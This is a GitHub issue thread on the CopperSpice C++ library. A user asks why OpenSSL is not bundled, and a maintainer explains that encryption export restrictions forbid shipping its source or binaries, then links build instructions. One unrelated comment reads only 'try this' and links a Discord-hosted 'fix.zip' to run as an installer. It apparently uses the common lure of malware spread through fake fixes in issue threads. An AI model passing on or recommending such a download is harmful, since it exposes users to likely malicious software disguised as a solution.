### ISSUE TITLE
Can you include OpenSSL in 3rdparty?

### ISSUE THREAD

**Issue by mh466lfa** [copperspice/copperspice#310]
It's a common practice. I see people doing this all the time. This way, OpenSSL will be built together with CopperSpice. Another external dependency is eliminated. On Windows, CopperSpice comes with pretty much all batteries included. OpenSSL is the only missing bit.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by bgeller** [comment]
Thanks for this question, this is a very interesting issue. Although some vendors will provide prebuilt versions of OpenSSL it may not be legal. 

The OpenSSL library contains encryption algorithms and there are countries where it is actually illegal to distribute encryption software without proper authorization. If CopperSpice was only distributed in the United States we could provide pre-built libraries.

As per the OpenSSL developers, it is the customer's responsibility to obtain the appropriate authorization in any country where their encryption software is restricted. We deliberately do not package OpenSSL with CopperSpice. 

In our CS Overview documentation we have full instructions about how to build OpenSSL for MSVC and MinGW.
https://www.copperspice.com/docs/cs_overview/openssl.html

Barbara

**Comment by mh466lfa** [comment]
Can't even include OpenSSL in source form? I didn't say anything about prebuilt binary!

**Comment by bgeller** [comment]
All software developers need to pay attention to software licensing.  Because OpenSSL contains encryption we are not legally allowed to include the source code or a binary.  If other vendors want to take this legal risk that is of course their choice.  We can confirm that most reputable US companies would not. 

If you are on Unix this can be installed by using your vendor package manager.  Our team has documented how to download the source and build for Windows, this link was provided in my other message.

Barbara
